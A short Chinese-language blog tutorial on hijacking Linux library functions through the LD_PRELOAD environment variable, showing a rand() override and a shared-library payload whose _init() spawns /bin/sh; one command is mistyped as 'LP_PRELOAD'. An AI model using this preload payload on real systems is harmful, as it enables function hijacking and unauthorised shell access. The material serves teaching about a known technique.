Linux下利用动态链接劫持库函数并注入代码

关于环境变量$ LD_PRELOAD

$LD_PRELOAD是一个环境变量,用于加载动态库,他的优先级是最高的

/*
    优先级顺序:
    (1)$LD_PRELOAD
    (2)$LD_LIBRARY_PATH
    (3)/etc/ld.so.cache
    (4)/lib
    (5)/usr/lib
*/

一个挑战就是,这玩意可以产生一个shell,就像下面这样:

$ LP_PRELOAD = ./payload.so /bin/true

劫持库函数

假设存在一段这样的代码,其编译过程

#include <stdio.h>
#include <time.h>
#include <stdlib.h>

int main(int argc, char const *argv[]){
    srand(time(NULL));
    printf("%d\n", rand());
}
gcc random.c -o random
./random

Linux下利用动态链接劫持库函数并注入代码

好的我们来覆写一下这个函数

int rand(void){
    return 32;
}
gcc -shared -fpic shlib.c -o shlib.so
LD_PRELOAD=./shlib.so ./random

Linux下利用动态链接劫持库函数并注入代码

构造Payload

#include <unistd.h>

void _init(){
    char *argv[] = {"/bin/sh", 0};
    execve(argv[0], &argv[0], NULL);
}

Linux下利用动态链接劫持库函数并注入代码

Linux下利用动态链接劫持库函数并注入代码

上一篇:Linux Centos7.5修改计算机名及密码


下一篇:Linux shell命令之脚本的灵活性